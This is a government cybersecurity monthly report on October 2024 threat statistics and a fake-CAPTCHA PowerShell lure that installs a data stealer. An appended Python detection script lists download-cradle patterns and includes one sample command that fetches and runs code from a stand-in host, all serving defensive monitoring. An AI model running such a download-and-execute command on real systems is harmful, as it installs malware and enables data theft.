
Cybersecurity Monthly Report (October 2024)

< Overall Threat Trend >

Ex ante joint defense and monitoring

  A total of 90,758 pieces of government agency cybersecurity joint defense intelligence were collected this month (an increase of 12,243 from the previous month), mainly due to the increase in the number of detected malware programs (an increase of over 11,000 cases). Analyzing the types of identifiable threats, the top one was information collection (39%), i.e., mainly obtaining information through activities such as scanning, probing, and social engineering; followed by intrusion attacks (22%), most involving unauthorized access to systems or acquisition of system/user privileges; and malware (19%), i.e., intelligence related to malware programs. The distribution of intelligence volume over the past year is shown in Figure 1.

    After further compilation and analysis of joint defense information, it was discovered that hackers recently impersonated a telecommunications company and sent social engineering emails to government agencies and the general public, using the current month's telecommunications bill notification as the theme. Hackers forged the text of an electronic bill email from a telecommunications company as bait, attached a malicious file, and mass-distributed emails containing malicious programs as social engineering attacks. The relevant intelligence has been provided to government agencies together with recommendations on joint defense and monitoring.


Figure 1   Statistics of cybersecurity monitoring intelligence in joint defense

In-process reporting and responding

   The number of cybersecurity incident reports totaled 79 this month (a decrease of 134 from the previous month), a 1.46-fold increase compared to the same period last year. This is mainly due to abnormal connections from, or suspected malware downloads to, the information equipment of various agencies during the month, which accounted for 27.85% of the total number of reports for this month. The statistics of cybersecurity incident reports over the past year are shown in Figure 2.

 Figure 2   Number of cybersecurity incident reports

Post-incident information sharing

    This month, a computer at an agency executed an abnormal PowerShell command, then downloaded and ran malicious programs. Upon investigation, it was found that the user had visited a website offering free tools and was guided through an "I'm not a robot" verification process. This led the user to manually execute the PowerShell command, causing the download and execution of a data-stealing program. The agency subsequently reinstalled the system of the compromised computer and strengthened cybersecurity awareness training for staff to prevent similar incidents in the future.

Additional Reference

    Recently, it has been discovered that hackers have used the Windows built-in command line tool PowerShell as one of their social engineering attack tools. Hackers inject malicious JavaScript code into websites; when users visit the compromised webpage, a CAPTCHA verification window pops up together with malicious PowerShell commands, luring the victims to open the "Run" dialog (Win+R), paste (Ctrl+V) the malicious PowerShell commands provided by the hackers, and execute them, which downloads and runs a data-stealing program (such as Lumma Stealer) in the background. This leads to the theft of sensitive data such as passwords and cryptocurrency wallets. To prevent such threats, it is recommended that organizations enable PowerShell logging and use EDR (Endpoint Detection and Response) and SIEM (Security Information and Event Management) systems to monitor unusual activity in real time, allowing suspicious actions to be quickly detected and intercepted. Furthermore, it is important to strengthen users' cybersecurity awareness so that they can recognize phishing attacks and fake verification pages. For instance, if a CAPTCHA differs from the usual form and displays unfamiliar commands, users should be extra cautious and avoid executing any commands of unknown origin, which significantly reduces the risk of data leakage and system compromise.
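    The PowerShell logging and EDR/SIEM monitoring recommended above can be expressed as a concrete detection rule for the "paste into Run dialog" pattern. The following Python script is an added example, not part of this report; it assumes process-creation records (for example Sysmon Event ID 1 or Windows Security 4688 with command-line auditing) that expose a parent image, image and command line, and every sample event in it is constructed.

```python
"""Flag Run-dialog PowerShell launches that carry download-and-execute traits.

Assumed input (not from the report): one record per process-creation event
with ParentImage, Image and CommandLine fields. Sample events are constructed.
"""
import re
from dataclasses import dataclass

# Command-line traits of the lure: hidden window, a download cradle,
# in-memory execution, or a long encoded command.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|net\.webclient)\b", re.I),
    "in_memory_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}
POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")


@dataclass
class ProcessEvent:
    parent_image: str   # a Win+R launch appears as a child of explorer.exe
    image: str
    command_line: str


def matched_indicators(ev: ProcessEvent) -> list[str]:
    """Names of the command-line indicators present in a PowerShell event."""
    if ev.image.lower().rsplit("\\", 1)[-1] not in POWERSHELL_IMAGES:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(ev.command_line)]


def is_clickfix_candidate(ev: ProcessEvent) -> bool:
    """PowerShell spawned by explorer.exe (the Run-dialog path) with at least two
    indicators; requiring two keeps plain interactive consoles out of the alert."""
    parent = ev.parent_image.lower().rsplit("\\", 1)[-1]
    return parent == "explorer.exe" and len(matched_indicators(ev)) >= 2


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed telemetry, not real events
    ProcessEvent(r"C:\Windows\explorer.exe", PS, "powershell.exe"),            # user opens a console
    ProcessEvent(r"C:\Windows\System32\cmd.exe", PS,
                 r"powershell -ExecutionPolicy Bypass -File C:\ops\backup.ps1"),  # scheduled admin script
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 "powershell -w hidden -c \"iex (iwr 'http://lure.example.invalid/v')\""),  # pasted lure
]


def triage(events: list[ProcessEvent]) -> list[tuple[str, list[str]]]:
    """(command_line, indicators) for every event that should raise an alert."""
    return [(ev.command_line, matched_indicators(ev)) for ev in events if is_clickfix_candidate(ev)]


if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_EVENTS):
        print(f"ALERT {hits}: {cmd}")
```

    In a SIEM the same logic maps to a rule on PowerShell process creation with parent explorer.exe plus two or more of these command-line patterns; script block logging (Event ID 4104) additionally records the decoded script body for the encoded-command case.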
